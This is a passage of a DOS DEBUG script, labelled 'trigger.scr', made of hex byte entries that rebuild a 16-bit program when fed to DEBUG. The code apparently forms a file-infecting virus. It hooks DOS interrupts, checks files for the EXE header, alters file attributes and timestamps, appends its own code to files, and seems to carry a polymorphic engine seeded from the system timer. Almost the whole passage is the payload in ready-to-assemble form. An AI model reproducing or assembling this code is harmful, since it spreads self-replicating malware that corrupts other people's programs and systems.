e 02A0 C8 3B 46 04 74 F2 8B 46 04 2E 3B 06 21 02 75 14
e 02B0 8B 46 02 2E 3B 06 1F 02 72 0A 2D 05 00 2E 3B 06
e 02C0 1F 02 76 D4 06 57 FC 2E C4 3E 1F 02 B0 EA AA B8
e 02D0 E2 01 AB 8C C8 AB 5F 07 81 66 06 FF FE EB B9 8B
e 02E0 D8 CF 3D 90 4B 74 F8 1E 57 2E C5 3E 1F 02 C7 05
e 02F0 34 12 C7 45 02 34 12 C6 45 04 12 5F 1F FC 3D 00
e 0300 4B 74 48 1E 50 33 C0 8E D8 FA C7 06 04 00 9B 01
e 0310 8C 0E 06 00 FB 9C 58 80 CC 01 50 9D 58 1F EA 00
e 0320 00 00 00 9C 2E FF 1E 1F 02 C3 5A 59 B8 01 57 E8
e 0330 F1 FF B4 3E E8 EC FF B8 01 43 5A 1F 59 E8 E3 FF
e 0340 07 1F 5F 5E 5D 5B 5A 59 58 EB B8 50 51 52 53 55
e 0350 56 57 1E 06 B8 00 43 E8 C9 FF 51 1E 52 B8 01 43
e 0360 33 C9 E8 BE FF B8 02 3D E8 B8 FF 72 CA 93 B8 00
e 0370 57 CD 21 51 52 B4 3F B9 18 00 0E 1F 0E 07 BA 67
e 0380 01 8B F2 E8 9D FF 72 A2 BF F9 09 B9 0C 00 56 57
e 0390 F3 A5 5F 5E B8 02 42 33 C9 99 CD 21 81 3D 4D 5A
e 03A0 75 2E 81 3E 77 01 53 50 74 80 A3 FD 09 89 16 FB
e 03B0 09 B9 10 00 F7 F1 2B 06 01 0A 89 16 0D 0A A3 0F
e 03C0 0A 87 CA A3 07 0A C7 06 09 0A 53 50 B0 02 EB 34
e 03D0 50 B9 04 00 33 D2 AC 02 D0 E2 FB 58 0A D2 74 C8
e 03E0 BA 18 00 3B C2 73 07 B8 00 42 33 C9 CD 21 8B C8
e 03F0 FE C5 2D 03 00 50 B0 E9 AA 58 AB 02 C4 04 E9 F6
e 0400 D8 AA B0 03 98 53 87 CB 33 F6 BF 11 0C B9 D1 04
e 0410 F3 A5 50 E8 67 00 58 BA 11 0C B9 A1 09 BE 91 0A
e 0420 BF 11 0A E8 A2 00 51 81 3E F9 09 4D 5A 75 21 8B
e 0430 16 FB 09 A1 FD 09 81 C1 A1 09 03 C1 83 D2 00 B9
e 0440 00 02 F7 F1 0B D2 74 01 40 A3 FD 09 89 16 FB 09
e 0450 FF D7 59 5B B4 40 BA 91 0A E8 C7 FE B4 40 B9 A1
e 0460 09 BA 11 0C E8 BC FE B8 00 42 33 C9 99 CD 21 B4
e 0470 40 B9 18 00 BA F9 09 E8 A9 FE E9 AD FE 52 51 53
e 0480 B4 2C CD 21 E4 40 8A E0 E4 40 33 C1 33 D0 EB 1C
e 0490 52 51 53 E4 40 05 00 00 BA 00 00 B9 07 00 D1 E0
e 04A0 D1 D2 8A D8 32 DE 79 02 FE C0 E2 F2 A3 96 03 89
e 04B0 16 99 03 8A C2 5B 59 5A C3 87 00 86 84 85 03 07
e 04C0 0F 1F 5F 5E 5A 59 5B 58 FC 50 53 51 52 56 57 E8
e 04D0 07 00 5F 5E 5A 5B 5B 58 C3 FC 50 B8 A7 09 97 AB
e 04E0 96 AB AB 92 AB 93 AB 87 CA E8 44 02 B9 1A 00 F3
e 04F0 AB E8 9C FF 25 FC FF 59 33 C8 E8 75 02 83 E3 03
e 0500 8A 87 BE 03 98 03 D0 F7 D0 23 D0 8B C2 AB D1 E8
e 0510 F6 C5 40 74 02 D1 E8 F6 C5 10 75 02 F7 D8 AB 92
e 0520 F6 C5 20 75 02 F7 D8 AB E8 65 FF AB B8 84 84 AA
e 0530 57 AB AA 5F E8 33 02 78 0B E8 00 02 AA E8 50 FF
e 0540 A3 F1 09 4F 47 EB 03 E8 07 02 E8 EF 01 3C 03 72
e 0550 F6 AA E8 15 02 78 04 E8 E2 01 AA E8 D2 01 8B 3E
e 0560 A9 09 E8 16 02 BE F5 09 56 E8 06 02 83 E3 03 8A
e 0570 00 98 A8 80 75 F3 80 8F F5 09 80 8B F0 FE 84 B1
e 0580 09 03 DB 8B 97 ED 09 C6 06 A1 09 00 E8 6F 02 E8
e 0590 E9 01 E8 06 01 51 80 E1 FC E8 AC 02 59 89 3E A7
e 05A0 09 5E BA 04 00 AC A8 80 74 B4 4A 75 F8 BE A7 09
e 05B0 BF A3 09 A5 A5 C6 06 A2 09 00 E8 65 00 F6 C5 40
e 05C0 74 08 C6 06 A2 09 02 E8 58 00 BB A3 09 51 80 E1
e 05D0 FC E8 58 00 59 B8 FC C3 AB BE BB 09 8B 3E AD 09
e 05E0 51 E8 19 00 59 BB A5 09 E8 41 00 E8 8A 01 89 3E
e 05F0 A9 09 BE CD 09 2B 3E AB 09 03 3E AF 09 F6 C5 20
e 0600 74 04 03 3E ED 09 2B 3E F1 09 8B 4C FE E3 08 97
e 0610 97 AD 97 01 05 E2 F9 8B 3E A9 09 8B CF 2B 0E AB
e 0620 09 C3 E8 84 00 E8 DA 00 E8 7E 00 C3 8B 7F 04 53
e 0630 C6 06 A1 09 00 A0 F7 09 25 07 00 BA 02 00 F6 C5
e 0640 40 74 02 D1 E2 F6 C5 20 74 02 F7 DA E8 F9 02 B2
e 0650 75 A0 F6 09 25 07 00 3C 04 74 26 52 BA 01 00 F6
e 0660 C5 10 74 19 3C 01 75 13 E8 FF 00 78 0E 5A E8 01
e 0670 01 87 DA 80 E2 02 80 CA E0 EB 06 F7 DA E8 C8 02
e 0680 5A 5B 8B 07 2B C7 48 48 86 E0 8A C2 F6 C4 80 75
e 0690 05 58 58 E9 2C FE AB 89 7F 04 C3 C6 06 A1 09 0A
e 06A0 89 3E A9 09 8B 3E A7 09 C3 8B 3E A9 09 E8 CB 00
e 06B0 A0 F8 09 25 07 00 3C 04 74 E1 E8 B5 00 80 FB C0
e 06C0 77 D9 E8 13 00 E8 DB 00 E8 D0 FF 51 80 E1 FC FF
e 06D0 50 01 59 89 3E A7 09 C3 C6 06 A1 09 00 E8 8A 00
e 06E0 78 08 E8 8D 00 BE 07 09 EB 15 E8 85 00 83 E3 07
e 06F0 80 FB 04 74 F5 80 BF B1 09 00 74 EE BE 3A 09 87
e 0700 D3 C3 8B 3E A9 09 E8 72 00 A0 F7 09 25 07 00 BB
e 0710 B6 03 D7 BD CB 09 E8 BF FF E8 0B 00 E8 84 00 BD
e 0720 B9 09 E8 02 00 EB A1 50 AC 98 03 F0 58 46 46 C3
e 0730 33 C0 BF B1 09 AB AB 40 AB 48 AB C3 E8 51 FD 25
e 0740 07 00 8B F0 80 BC B1 09 00 75 F1 FE 84 B1 09 C3
e 0750 92 8B F0 C6 84 B1 09 00 C3 50 51 57 BF B1 09 B9
e 0760 08 00 33 C0 F2 AE 5F 59 58 C3 50 E8 22 FD 0B C0
e 0770 58 C3 93 E8 1A FD 93 C3 E8 00 00 C6 06 A1 09 00
e 0780 E8 00 00 E8 D3 FF 75 EF F6 C1 02 74 EA 50 52 E8
e 0790 FE FC 92 E8 A6 FF E8 B8 FF BE EE 08 EB 07 56 E8
e 07A0 E1 FF 5E 50 52 56 51 91 AC 98 91 E8 C4 FF 23 D9
e 07B0 59 FE 06 A1 09 80 3E A1 09 0A 72 02 33 DB 53 FF
e 07C0 10 5B 5E 5A 58 C3 BE 3A 09 83 E2 07 EB D5 BE 07
e 07D0 09 EB D0 92 24 07 BB FF 08 D7 AA C3 92 25 0F 00
e 07E0 0C 70 AB C3 0A C0 78 04 04 50 AA C3 05 30 FF EB
e 07F0 0A 0A C0 78 04 04 58 AA C3 B4 8F E9 F0 00 BE 55
e 0800 09 EB 9B E8 6C FF 53 2B D3 E8 F2 FF 5A EB 23 3C
e 0810 04 73 35 50 52 E8 38 00 5A 58 86 F2 EB 30 E8 51
e 0820 FF 53 33 D3 E8 D7 FF 5A E9 96 00 52 8B D0 E8 9B
e 0830 00 5A E9 13 01 D1 CA E8 C4 FF EB 07 D1 C2 E8 BD
e 0840 FF 0C 08 B4 D1 E9 A6 00 04 B8 AA 92 AB C3 04 04
e 0850 04 B0 8A E2 AB C3 BE 66 09 EB A6 50 92 E8 84 FF
e 0860 58 EB 8E B4 8B EB 6D E8 00 FF 78 EA BE 6F 09 E9
e 0870 2C FF 52 50 52 E8 6C FF 58 E8 68 FF 58 E8 71 FF
e 0880 58 E9 6D FF E8 D2 FE 75 14 52 50 E8 AE FE E8 D6
e 0890 FF 5A E8 D7 FF 5A 92 E8 CD FF E9 B3 FE 0A C0 78
e 08A0 0A 3A C2 7F 02 86 C2 0A D2 74 06 86 C2 B4 87 EB
e 08B0 35 04 90 AA C3 E8 BA FE 53 33 D3 E8 03 00 5A EB
e 08C0 00 BE 78 09 E9 D7 FE 0C 30 E9 8B 00 BE 81 09 E9
e 08D0 CC FE B4 33 0A C0 78 09 0A D2 78 0A E8 8B FE 78
e 08E0 05 86 C2 80 EC 02 D0 E0 D0 E0 D0 E0 0A C2 0A C0
e 08F0 78 02 0C C0 86 E0 F6 C4 40 75 1D F6 C1 01 75 05
e 0900 50 B0 2E AA 58 AB 2E 8B 76 00 03 F6 2E 89 7A 02
e 0910 2E FF 46 00 A0 A2 09 98 AB C3 BE 86 09 E9 7E FE
e 0920 B4 03 EB B0 BE 8B 09 E9 74 FE B4 2B EB A6 E8 50
e 0930 00 4A EB 14 E8 45 00 42 EB 0E E8 35 FE 53 2B D3
e 0940 E8 05 00 5A EB 02 F7 DA 0B D2 75 01 C3 BE 90 09
e 0950 E9 4B FE 0A C0 74 0E 0A C0 78 02 04 C0 B4 81 E8
e 0960 8C FF 92 AB C3 B0 05 AA EB F8 F7 DA 0B D2 74 DC
e 0970 0A C0 74 04 04 28 EB DF B0 2D EB EB 50 04 08 EB
e 0980 01 50 0A C0 79 07 B4 FF E8 63 FF 58 C3 04 40 AA
e 0990 58 C3 BB 56 07 BE 67 07 EB 0F BB D2 07 EB 08 BB
e 09A0 20 08 EB 03 BB 2A 08 8B F3 E8 AD FD 75 2E 50 56
e 09B0 E8 89 FD E8 A0 FE 5E 5A 92 52 FF D6 5A E9 90 FD
e 09C0 BB C1 07 BE CC 07 E8 90 FD 75 11 50 56 E8 6C FD
e 09D0 E8 2B FE 92 5E 58 52 FF D6 5A EB E1 FF E3 BB 48
e 09E0 08 BE 1A 08 EB E0 BB FE 06 BE 67 07 EB D8 0E 77
e 09F0 06 77 06 C6 06 C6 06 CE 06 CE 06 D3 06 DC 06 F8
e 0A00 F5 F9 FC FD FB CC F0 0E C1 07 FE 06 6C 08 48 08
e 0A10 7C 08 81 08 41 07 43 07 0E C1 07 6C 08 48 08 48
e 0A20 08 7C 08 81 08 41 07 43 07 0E C1 07 48 08 6C 08
e 0A30 6C 08 81 08 7C 08 43 07 41 07 06 CC 07 56 07 24
e 0A40 08 1A 08 06 CC 07 CC 07 24 08 1A 08 06 CC 07 CC
e 0A50 07 1A 08 24 08 0E 48 07 E6 08 03 07 0F 07 1E 07
e 0A60 2B 07 35 07 3C 07 06 63 07 63 07 92 08 5B 07 06
e 0A70 9D 07 9D 07 72 07 84 07 06 C7 07 C7 07 C0 08 B5
e 0A80 07 02 D2 07 9A 08 02 20 08 9F 08 02 2A 08 A4 08
e 0A90 0E 53 08 53 08 DE 08 6A 08 2E 08 34 08 3A 08 3A
e 0AA0 08
rcx
09A1
w
q
-end trigger.scr---------------------------------------------------------------
